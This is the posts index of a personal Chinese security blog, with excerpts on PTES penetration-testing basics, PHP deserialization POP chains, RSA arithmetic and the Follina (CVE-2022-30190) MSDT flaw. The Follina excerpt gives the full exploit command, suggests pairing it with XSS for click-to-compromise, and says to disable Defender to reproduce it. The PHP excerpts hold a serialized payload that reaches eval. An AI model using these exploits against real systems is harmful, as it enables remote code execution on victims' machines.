<!DOCTYPE html>
<html lang="en" dir="auto">

<head><meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="robots" content="index, follow">
<title>Posts | dayu&#39;s blog</title>
<meta name="keywords" content="">
<meta name="description" content="Posts - dayu&#39;s blog">
<meta name="author" content="dayu">
<link rel="canonical" href="https://killdayu.com/posts/">
<link crossorigin="anonymous" href="/assets/css/stylesheet.bc1149f4a72aa4858d3a9f71462f75e5884ffe8073ea9d6d5761d5663d651e20.css" integrity="sha256-vBFJ9KcqpIWNOp9xRi915YhP/oBz6p1tV2HVZj1lHiA=" rel="preload stylesheet" as="style">
<link rel="icon" href="https://killdayu.com/favicon.ico">
<link rel="icon" type="image/png" sizes="16x16" href="https://killdayu.com/favicon-16x16.png">
<link rel="icon" type="image/png" sizes="32x32" href="https://killdayu.com/favicon-32x32.png">
<link rel="apple-touch-icon" href="https://killdayu.com/apple-touch-icon.png">
<link rel="mask-icon" href="https://killdayu.com/safari-pinned-tab.svg">
<meta name="theme-color" content="#2e2e33">
<meta name="msapplication-TileColor" content="#2e2e33">
<link rel="alternate" type="application/rss+xml" href="https://killdayu.com/posts/index.xml">
<noscript>
    <style>
        #theme-toggle,
        .top-link {
            display: none;
        }

    </style>
    <style>
        @media (prefers-color-scheme: dark) {
            :root {
                --theme: rgb(29, 30, 32);
                --entry: rgb(46, 46, 51);
                --primary: rgb(218, 218, 219);
                --secondary: rgb(155, 156, 157);
                --tertiary: rgb(65, 66, 68);
                --content: rgb(196, 196, 197);
                --hljs-bg: rgb(46, 46, 51);
                --code-bg: rgb(55, 56, 62);
                --border: rgb(51, 51, 51);
            }

            .list {
                background: var(--theme);
            }

            .list:not(.dark)::-webkit-scrollbar-track {
                background: 0 0;
            }

            .list:not(.dark)::-webkit-scrollbar-thumb {
                border-color: var(--theme);
            }
        }

    </style>
</noscript>
<link rel="stylesheet" href="/js/katex/katex.min.css" >
<script src="/js/katex/katex.min.js" > </script>
<script src="/js/katex/contrib/auto-render.min.js" ></script>
 
<script>
    document.addEventListener("DOMContentLoaded", function() {
      renderMathInElement(document.body);
    });
</script><meta property="og:title" content="Posts" />
<meta property="og:description" content="Theme PaperMod - https://github.com/adityatelange/hugo-PaperMod" />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://killdayu.com/posts/" /><meta property="og:image" content="https://killdayu.com/papermod-cover.png"/>

<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:image" content="https://killdayu.com/papermod-cover.png"/>

<meta name="twitter:title" content="Posts"/>
<meta name="twitter:description" content="Theme PaperMod - https://github.com/adityatelange/hugo-PaperMod"/>


<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "BreadcrumbList",
  "itemListElement": [
    {
      "@type": "ListItem",
      "position":  1 ,
      "name": "Posts",
      "item": "https://killdayu.com/posts/"
    }
  ]
}
</script>
</head>

<body class="list" id="top">
<script>
    if (localStorage.getItem("pref-theme") === "dark") {
        document.body.classList.add('dark');
    } else if (localStorage.getItem("pref-theme") === "light") {
        document.body.classList.remove('dark')
    } else if (window.matchMedia('(prefers-color-scheme: dark)').matches) {
        document.body.classList.add('dark');
    }

</script>

<header class="header">
    <nav class="nav">
        <div class="logo">
            <a href="https://killdayu.com/" accesskey="h" title="dayu&#39;s blog (Alt + H)">dayu&#39;s blog</a>
            <div class="logo-switches">
                <button id="theme-toggle" accesskey="t" title="(Alt + T)">
                    <svg id="moon" xmlns="http://www.w3.org/2000/svg" width="24" height="18" viewBox="0 0 24 24"
                        fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round"
                        stroke-linejoin="round">
                        <path d="M21 12.79A9 9 0 1 1 11.21 3 7 7 0 0 0 21 12.79z"></path>
                    </svg>
                    <svg id="sun" xmlns="http://www.w3.org/2000/svg" width="24" height="18" viewBox="0 0 24 24"
                        fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round"
                        stroke-linejoin="round">
                        <circle cx="12" cy="12" r="5"></circle>
                        <line x1="12" y1="1" x2="12" y2="3"></line>
                        <line x1="12" y1="21" x2="12" y2="23"></line>
                        <line x1="4.22" y1="4.22" x2="5.64" y2="5.64"></line>
                        <line x1="18.36" y1="18.36" x2="19.78" y2="19.78"></line>
                        <line x1="1" y1="12" x2="3" y2="12"></line>
                        <line x1="21" y1="12" x2="23" y2="12"></line>
                        <line x1="4.22" y1="19.78" x2="5.64" y2="18.36"></line>
                        <line x1="18.36" y1="5.64" x2="19.78" y2="4.22"></line>
                    </svg>
                </button>
            </div>
        </div>
        <ul id="menu">
            <li>
                <a href="https://killdayu.com/archives" title="Archive">
                    <span>Archive</span>
                </a>
            </li>
            <li>
                <a href="https://killdayu.com/categories/" title="Categories">
                    <span>Categories</span>
                </a>
            </li>
            <li>
                <a href="https://killdayu.com/search/" title="Search (Alt &#43; /)" accesskey=/>
                    <span>Search</span>
                </a>
            </li>
            <li>
                <a href="https://killdayu.com/tags/" title="Tags">
                    <span>Tags</span>
                </a>
            </li>
        </ul>
    </nav>
</header>
<main class="main"> 
<header class="page-header"><div class="breadcrumbs"><a href="https://killdayu.com/">Home</a></div>
  <h1>
    Posts
    <a href="index.xml" title="RSS" aria-label="RSS">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
        stroke-linecap="round" stroke-linejoin="round" height="23">
        <path d="M4 11a9 9 0 0 1 9 9" />
        <path d="M4 4a16 16 0 0 1 16 16" />
        <circle cx="5" cy="19" r="1" />
      </svg>
    </a>
  </h1>
</header>

<article class="post-entry"> 
  <header class="entry-header">
    <h2>天津电子信息渗透测试第一课
    </h2>
  </header>
  <div class="entry-content">
    <p>第一节，ptes概述 一次成功的渗透测试应该考虑周到，按照与甲方达成的约定，在约定时间和约定测试范围内对业务的安全性、稳定性等进行测试。这需要前期良好的沟通，与甲方约定测试范围，哪些业务和资产是被允许访问的，协调可接受的测试方法和预期的测试成果。最重要的是满足甲方的需求。没有完全安全的系统，但是可以把风险与损失控制在可接受的范围内。渗透测试就是来评估系统中的漏洞和脆弱性，站在客户角度或者开发人员角度，给出专业性的意见和修改方案，给风险管理一个可参考的基准量表。
渗透测试当然需要标准规范，专业的渗透测试需要一套标准流程，来帮助客户理解我们做了什么，能够更好地沟通，同时规范和标准化测试人员的行为和工作方法。
PTES就是这样一个标准，它包含了渗透测试的几乎所有内容，从沟通到最后完成测试出具报告，具有很高的参考价值。
第二节，网络基本环境拓扑 第三节，渗透测试报告实施方案撰写 </p>
  </div>
  <footer class="entry-footer"><span title='2023-03-08 15:43:52 +0800 CST'>March 8, 2023</span>&nbsp;·&nbsp;1 min&nbsp;·&nbsp;dayu</footer>
  <a class="entry-link" aria-label="post link to 天津电子信息渗透测试第一课" href="https://killdayu.com/posts/%E5%A4%A9%E6%B4%A5%E7%94%B5%E5%AD%90%E4%BF%A1%E6%81%AF%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%AC%AC%E4%B8%80%E8%AF%BE/"></a>
</article>

<article class="post-entry"> 
  <header class="entry-header">
    <h2>php_反序列化_2
    </h2>
  </header>
  <div class="entry-content">
    <p>pop链 pop链，通过反序列化控制class属性，来构造一条完整的利用链。
easy &lt;?php //error_reporting(0); highlight_file(__FILE__); class errorr0{ protected $var; function __construct() { $this-&gt;var = new errorr1(); } function __destruct() { $this-&gt;var-&gt;func(); } } class errorr1 { public $var; function func() { echo $this-&gt;var; } } class errorr2 { private $data; public function func() { eval($this-&gt;data); } } unserialize($_GET[&#39;err&#39;]); ?&gt; 反向构造pop链，errorr2::func()-&gt;errorr0::__destruct()-&gt;errorr0::__construct
poc &lt;?php //error_reporting(0); highlight_file(__FILE__); class errorr0{ protected $var; function __construct() { $this-&gt;var = new errorr1(); } function __destruct() { $this-&gt;var-&gt;func(); } } class errorr1 { public $var; function func() { echo $this-&gt;var; } } class errorr2 { private $data; public function func() { eval($this-&gt;data); } } $a = new errorr0; $a-&gt;var=new errorr2; $a-&gt;var-&gt;data=&#39;phpinfo();&#39;; echo serialize($a);	//O:7:&#34;errorr0&#34;:1:{s:3:&#34;var&#34;;O:7:&#34;errorr2&#34;:1:{s:4:&#34;data&#34;;s:10:&#34;phpinfo();&#34;;}} //`errorr2::func()`-&gt;`errorr0::__destruct()`-&gt;`errorr0::__construct` ?...</p>
  </div>
  <footer class="entry-footer"><span title='2022-07-21 13:48:27 +0800 CST'>July 21, 2022</span>&nbsp;·&nbsp;5 min&nbsp;·&nbsp;dayu</footer>
  <a class="entry-link" aria-label="post link to php_反序列化_2" href="https://killdayu.com/posts/php_%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96_2/"></a>
</article>

<article class="post-entry"> 
  <header class="entry-header">
    <h2>php_反序列化_1
    </h2>
  </header>
  <div class="entry-content">
    <p>简介 不会php。
https://www.php.net/manual/zh/language.oop5.serialization.php
&lt;?php class A { public $one = 1; public $two = &#39;2&#39;; public function show_one() { echo $this-&gt;one; } } $a = new A; $s = serialize($a); echo $s;	O:1:&#34;A&#34;:2:{s:3:&#34;one&#34;;i:1;s:3:&#34;two&#34;;s:1:&#34;2&#34;;} ?&gt; https://www.toolnb.com/tools/phpserialize.html
序列化一个对象将会保存对象的所有变量，但是不会保存对象的方法，只会保存类的名字。
O:1:&#34;A&#34;:2:{s:3:&#34;one&#34;;i:1;s:3:&#34;two&#34;;s:1:&#34;2&#34;;} object(__PHP_Incomplete_Class)#5 (3) { [&#34;__PHP_Incomplete_Class_Name&#34;]=&gt; string(1) &#34;A&#34; [&#34;one&#34;]=&gt; int(1) [&#34;two&#34;]=&gt; string(1) &#34;2&#34; } 序列化就是将对象转换成字符串来存储，反序列化就是将字符串还原为对象。
php通过serialize()和unserialize()来进行序列化操作。
其中有几个魔术方法需要关注一下。
https://www.php.net/manual/zh/language.oop5.magic.php
魔术方法是一种特殊的方法，当对对象执行某些操作时会覆盖 PHP 的默认操作。
__construct() //当一个对象创建时被调用 __destruct() //当一个对象销毁时被调用 __toString() //当一个对象被当作一个字符串使用 __sleep() //在对象被序列化之前运行 __wakeup() //在对象被反序列化之后被调用 简单的序列化 [NPUCTF2020]ReadlezPHP
&lt;?php #error_reporting(0); highlight_file(__FILE__); echo &#34;&lt;/p&gt;&#34;; class HelloPhp { public $a; public $b; public function __construct(){ $this-&gt;a = &#34;Y-m-d h:i:s&#34;; $this-&gt;b = &#34;date&#34;; echo &#39;__construct $this-&gt;a: &#39;....</p>
  </div>
  <footer class="entry-footer"><span title='2022-07-20 09:48:27 +0800 CST'>July 20, 2022</span>&nbsp;·&nbsp;3 min&nbsp;·&nbsp;dayu</footer>
  <a class="entry-link" aria-label="post link to php_反序列化_1" href="https://killdayu.com/posts/php_%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96_1/"></a>
</article>

<article class="post-entry"> 
  <header class="entry-header">
    <h2>RSA算法
    </h2>
  </header>
  <div class="entry-content">
    <p>简介 RSA算法是一种非对称算法，即公钥和密钥不相同，本质是利用2个大素数的乘积难以做因素分解。
算法 RSA算法的密钥由3个数构成N，d，e
N由2个互不相同的素数的乘积构成 $$ N=pq $$
根据欧拉函数，求得r，即小于N且与N互质的数的个数。 $$ {\displaystyle r=\varphi (N)=(p-1)(q-1)} $$
选择其中的一个质数为e，找到一个数 d。 $$ ed \bmod r=1 $$
现在N，d，e都已经拿到了，公钥是(N, e)，私钥是(N, d)。那么N和e就是公开的，而d是保密的。
测试 然后就能使用公钥加密数据，然后私钥解密数据了。
首先我们先选2个素数来算出N，我这里选择了3和5，那么N = 3 x 5 = 15
那么r = (3 - 1) x (5 - 1) = 8，即15以内有8个数与它互质，他们分别是1，2，4，7，8，11，13，14。其中质数有2，7，11，13。
这里选择11为e，根据(d x 11) % 8 = 1，求出d = 3
d = 0 e = 11 r = 8 while(1): if ((d * e) % r == 1): print(d)	//3 break d = d &#43; 1 那么现在N = 15，e = 11，d = 3，公钥为(15, 11)，私钥为(15, 3)。...</p>
  </div>
  <footer class="entry-footer"><span title='2022-07-12 13:48:27 +0800 CST'>July 12, 2022</span>&nbsp;·&nbsp;2 min&nbsp;·&nbsp;dayu</footer>
  <a class="entry-link" aria-label="post link to RSA算法" href="https://killdayu.com/posts/rsa%E7%AE%97%E6%B3%95/"></a>
</article>

<article class="post-entry"> 
  <header class="entry-header">
    <h2>CVE_2022_30190_MSDT_RCE
    </h2>
  </header>
  <div class="entry-content">
    <p>CVE-2022-30190 虽迟但到
刚起床，然后有事，就看了下这个洞，几天前就看见过这个洞了，但是我是个废物就懒的弄。
漏洞原理 首先说一下自己对这个洞的理解，这个洞的本质就是msdt过滤的问题，导致msdt协议可以执行powershell代码。
但是这个洞为什么个Office能关联上呢？
因为Office在打开docx的时候可以加载一个web网页，然后web网页就能调用msdt协议，问题的关键就在于旧版本的Office在调用msdt协议的时候默认同意，而新版本则不同意，然后msdt绕过过滤就能执行powershell了。旧版本的Office应该是2013到2021 ltsc以下的，我用的2016复现成功，2021 pro plus则不行。
其实也不需要配合Office，浏览器就行，只不过需要手动点一下同意调用，这里可以直接利用xss，嘿嘿嘿。
漏洞代码 https://paper.seebug.org/1913/
Exp:
C:\Windows\system32\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param &#34;IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=fff$(IEX(&#39;mspaint.exe&#39;))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe &#34; 一看这个exp就是为了绕过某种限制。
$appName = [System.IO.Path]::GetFileNameWithoutExtension($selectedProgram).Replace(&#34;$&#34;, &#34;$&#34;)	//没修复的 $appName = [System.IO.Path]::GetFileNameWithoutExtension($selectedProgram).Replace(&#34;`$&#34;, &#34;``$&#34;)	//修复过的 可以利用github这个项目快速生成一个exp word文件
https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed
漏洞测试 直接cmd运行一下这个
C:\Windows\system32\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param &#34;IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=fff$(IEX(&#39;mspaint.exe&#39;))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe &#34; 如果能弹出画图就成功了，不能就是狗拦了或者系统打补丁了，Office也更不可能利用成功。
Office测试
如果打开的时候有请求记录但是没弹出计算器那就是Office版本问题（cmd能执行成功的情况下）。
OK
漏洞环境 Office：2013-2021ltsc（大概是）
Windows：卸载6月补丁，忘记kb号了，自己看看吧。关闭Defender，或者回退旧版本。
差不多就这样。
一些发现 可以直接配合xss，点击即上线。
&lt;script&gt; location.href = &#34;ms-msdt:/id PCWDiagnostic /skip force /param \&#34;IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=fff$(IEX(&#39;mspaint....</p>
  </div>
  <footer class="entry-footer"><span title='2022-06-25 18:45:36 +0800 CST'>June 25, 2022</span>&nbsp;·&nbsp;1 min&nbsp;·&nbsp;dayu</footer>
  <a class="entry-link" aria-label="post link to CVE_2022_30190_MSDT_RCE" href="https://killdayu.com/posts/cve_2022_30190_msdt_rce/"></a>
</article>
<footer class="page-footer">
  <nav class="pagination">
    <a class="next" href="https://killdayu.com/posts/page/2/">Next&nbsp;&nbsp;»
    </a>
  </nav>
</footer>
    </main>
    
<footer class="footer">
    <span>&copy; 2023 <a href="https://killdayu.com/">dayu&#39;s blog</a></span>
    <span>
        Powered by
        <a href="https://gohugo.io/" rel="noopener noreferrer" target="_blank">Hugo</a> &
        <a href="https://github.com/adityatelange/hugo-PaperMod/" rel="noopener" target="_blank">PaperMod</a>
    </span>
</footer>
<a href="#top" aria-label="go to top" title="Go to Top (Alt + G)" class="top-link" id="top-link" accesskey="g">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 12 6" fill="currentColor">
        <path d="M12 6H0l6-6z" />
    </svg>
</a>

<script>
    let menu = document.getElementById('menu')
    if (menu) {
        menu.scrollLeft = localStorage.getItem("menu-scroll-position");
        menu.onscroll = function () {
            localStorage.setItem("menu-scroll-position", menu.scrollLeft);
        }
    }

    document.querySelectorAll('a[href^="#"]').forEach(anchor => {
        anchor.addEventListener("click", function (e) {
            e.preventDefault();
            var id = this.getAttribute("href").substr(1);
            if (!window.matchMedia('(prefers-reduced-motion: reduce)').matches) {
                document.querySelector(`[id='${decodeURIComponent(id)}']`).scrollIntoView({
                    behavior: "smooth"
                });
            } else {
                document.querySelector(`[id='${decodeURIComponent(id)}']`).scrollIntoView();
            }
            if (id === "top") {
                history.replaceState(null, null, " ");
            } else {
                history.pushState(null, null, `#${id}`);
            }
        });
    });

</script>
<script>
    var mybutton = document.getElementById("top-link");
    window.onscroll = function () {
        if (document.body.scrollTop > 800 || document.documentElement.scrollTop > 800) {
            mybutton.style.visibility = "visible";
            mybutton.style.opacity = "1";
        } else {
            mybutton.style.visibility = "hidden";
            mybutton.style.opacity = "0";
        }
    };

</script>
<script>
    document.getElementById("theme-toggle").addEventListener("click", () => {
        if (document.body.className.includes("dark")) {
            document.body.classList.remove('dark');
            localStorage.setItem("pref-theme", 'light');
        } else {
            document.body.classList.add('dark');
            localStorage.setItem("pref-theme", 'dark');
        }
    })

</script>
</body>

</html>
